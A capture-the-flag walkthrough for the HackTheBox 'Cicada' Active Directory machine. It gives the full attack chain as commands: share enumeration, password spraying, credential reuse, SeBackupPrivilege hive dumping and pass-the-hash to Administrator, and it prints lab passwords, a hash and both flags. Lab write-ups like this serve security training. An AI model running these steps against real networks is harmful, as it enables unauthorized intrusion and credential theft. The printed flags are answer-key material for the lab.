A comprehensive penetration testing walkthrough for the Cicada machine from HackTheBox.
Cicada is a medium-difficulty Windows Active Directory machine that involves comprehensive enumeration, password reuse exploitation, and privilege escalation through backup privileges.
Target IP: 10.129.11.232
Domain: CICADA-DC.cicada.htb
Initial port discovery using aggressive Nmap scan:
export target=10.129.11.232
sudo nmap -p- --min-rate 5000 -sT -vvv $target
Discovered Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 50845
Comprehensive service version detection and script scanning:
sudo nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,50845 -T4 $target
Key Services Identified:
Anonymous SMB share enumeration revealed accessible shares:
smbclient -N -L //10.129.11.232/
Available Shares:
The HR share contained a welcome notice with default credentials:
smbclient //10.129.11.232/HR
cat "Notice from HR.txt"
Credentials Discovered:
Default password pattern: Cicada$M6Corpb*@Lp#nZp!8
RID brute-forcing to discover domain users:
crackmapexec smb $target -u 'guest' -p '' --rid-brute 2>/dev/null
Discovered Domain Users:
Password spraying with discovered default credentials:
crackmapexec smb $target -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success 2>/dev/null
Valid Credentials Found:
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Further enumeration revealed another user’s credentials:
crackmapexec smb $target -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users 2>/dev/null
Additional Credentials:
david.orelious:aRt$Lp#7t*VQ!3
Accessing the DEV share with David’s credentials:
smbclient -U 'david.orelious%aRt$Lp#7t*VQ!3' //10.129.11.232/DEV
Discovered File: Backup_script.ps1
The PowerShell backup script contained hardcoded credentials:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
New Credentials: emily.oscars:Q!3@Lp#M6b*7t*Vt
Testing WinRM access with Emily’s credentials:
crackmapexec winrm $target -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' 2>/dev/null
evil-winrm -i $target -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
User Flag: 3692d04e5db2d48dadce05ee6a469235
Checking user privileges:
whoami /priv
Key Privileges:
Utilizing SeBackupPrivilege to extract SAM and SYSTEM hives:
reg save HKLM\SAM C:\Users\emily.oscars.CICADA\Documents\sam
reg save HKLM\SYSTEM C:\Users\emily.oscars.CICADA\Documents\SYSTEM
Using Impacket to extract password hashes:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Administrator NTLM Hash: 2b87e7c93a3e8a0ea4a581937016f341
Pass-the-hash attack using Evil-WinRM:
evil-winrm -i $target -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
Root Flag: ff17e2ce0fc4b8e1f0fb7947aa0dd60a
The Cicada machine demonstrated several critical security issues: